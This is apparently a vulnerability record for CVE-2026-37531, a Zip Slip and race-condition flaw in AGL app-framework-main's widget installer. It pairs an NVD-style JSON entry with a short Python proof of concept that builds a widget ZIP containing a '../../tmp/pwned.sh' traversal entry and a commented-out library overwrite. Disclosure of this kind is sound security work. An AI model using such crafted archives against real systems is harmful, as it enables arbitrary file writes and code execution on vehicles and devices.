CVE-2026-37531

import zipfile import os # Create a malicious ZIP file demonstrating Zip Slip # This script creates a zip containing a file that escapes the extraction directory def create_malicious_zip(filename): with zipfile.ZipFile(filename, 'w') as zf: # Normal file zf.writestr('normal.txt', 'This is a safe file.') # Malicious file using path traversal (Zip Slip) # The '../' sequence attempts to write outside the intended extraction folder malicious_content = '#!/bin/bash\necho "System compromised via CVE-2026-37531"' # Attempting to write to /tmp/pwned.sh zf.writestr('../../tmp/pwned.sh', malicious_content) # Attempting to overwrite a system library (hypothetical) # zf.writestr('../../usr/lib/libmalicious.so', 'MALICIOUS_CODE') print(f"[+] Created malicious ZIP file: {filename}") print("[+] This ZIP contains entries with '../' to test path traversal.") if __name__ == "__main__": create_malicious_zip("malicious_widget.wgt")

{"cve": {"id": "CVE-2026-37531", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:22.720", "lastModified": "2026-05-07T15:15:55.993", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "AGL app-framework-main thru 17.1.12 contains a Zip Slip path traversal vulnerability (CWE-22) combined with a TOCTOU race condition (CWE-367) in the widget installation flow. The is_valid_filename function in wgtpkg-zip.c validates ZIP entry names but does not check for dot notation directory traversal sequences it only blocks absolute paths. The zread extraction function uses openat(workdirfd, filename, O_CREAT) which resolves dot notation values relative to the work directory, allowing files to be written anywhere on the filesystem. Critically, in function install_widget in file wgtpkg-install.c, extraction via zread occurs BEFORE signature verification via check_all_signatures. Even if signature verification fails, the error cleanup (remove_workdir) only deletes the temporary work directory files written outside via path traversal persist permanently."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://gerrit.automotivelinux.org/gerrit/src/app-framework-main", "source": "[email protected]"}, {"url": "https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643", "source": "[email protected]"}]}}